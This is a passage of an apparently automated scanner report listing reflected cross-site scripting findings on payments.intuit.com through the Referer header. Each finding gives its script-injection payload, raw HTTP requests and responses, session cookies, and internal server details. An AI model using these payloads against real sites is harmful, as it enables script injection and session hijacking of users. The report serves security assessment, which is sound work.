Path:	/products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 61f73--><script>alert(1)</script>21df0f4a775 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=AwCJVZhrS7L9PL77W4UPvA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960D1CF0A0805192AA117E387C70DA2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134961

...[SNIP]...
<script>alert(1)</script>21df0f4a775 | -->
...[SNIP]...

2.86. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f286'-alert(1)-'8e7fe4c65dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5CWHEzLF1rjja5gV+LodRA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B41DF0A0805192AA117E3398C5781
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd';
                   </script>
...[SNIP]...

2.87. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 248a2--><script>alert(1)</script>58daf8a9700 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=WOX-8RjjKZe+4ObdoWoTxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B81750A0805192AA117E380211446
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92686

...[SNIP]...
<script>alert(1)</script>58daf8a9700 | -->
...[SNIP]...

2.88. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f767'-alert(1)-'9675c472618 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FKPARISn46qm1b8HC-sSUQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616C710A0805192AA117E3B96D5DA6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151809


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618';
                   </script>
...[SNIP]...

2.89. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload de4d4--><script>alert(1)</script>82fdb4532f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PyZhGH72PBrAq3Hf4qd1tg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:10 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96180120A0805192AA117E3C5484290
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151842

...[SNIP]...
<script>alert(1)</script>82fdb4532f7 | -->
...[SNIP]...

2.90. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f96'-alert(1)-'b074d756760 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rnCR0HgxGDD5+iZ-tWA2Mw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9606A630A0805192AA117E378B5BFD1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110754


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760';
                   </script>
...[SNIP]...

2.91. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 89bfc--><script>alert(1)</script>439a0271950 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0xNoB2tLCGWrVWeGSlYOGg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A7C00A0805192AA117E36C190326
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110789

...[SNIP]...
<script>alert(1)</script>439a0271950 | -->
...[SNIP]...

2.92. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13123'-alert(1)-'be5801a90fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=v+hf0L3PiOVSnTMZkzeHEw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3C7A0A0805192AA117E30A9ED903
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96465


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa';
                   </script>
...[SNIP]...

2.93. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d754d--><script>alert(1)</script>cf0ed983ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wIeJmrvn-NaS8PtECoD4IQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C7A2C0A0805192AA117E362280873
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96494

...[SNIP]...
<script>alert(1)</script>cf0ed983ea | -->
...[SNIP]...

2.94. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0d6'-alert(1)-'c1f71db423d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
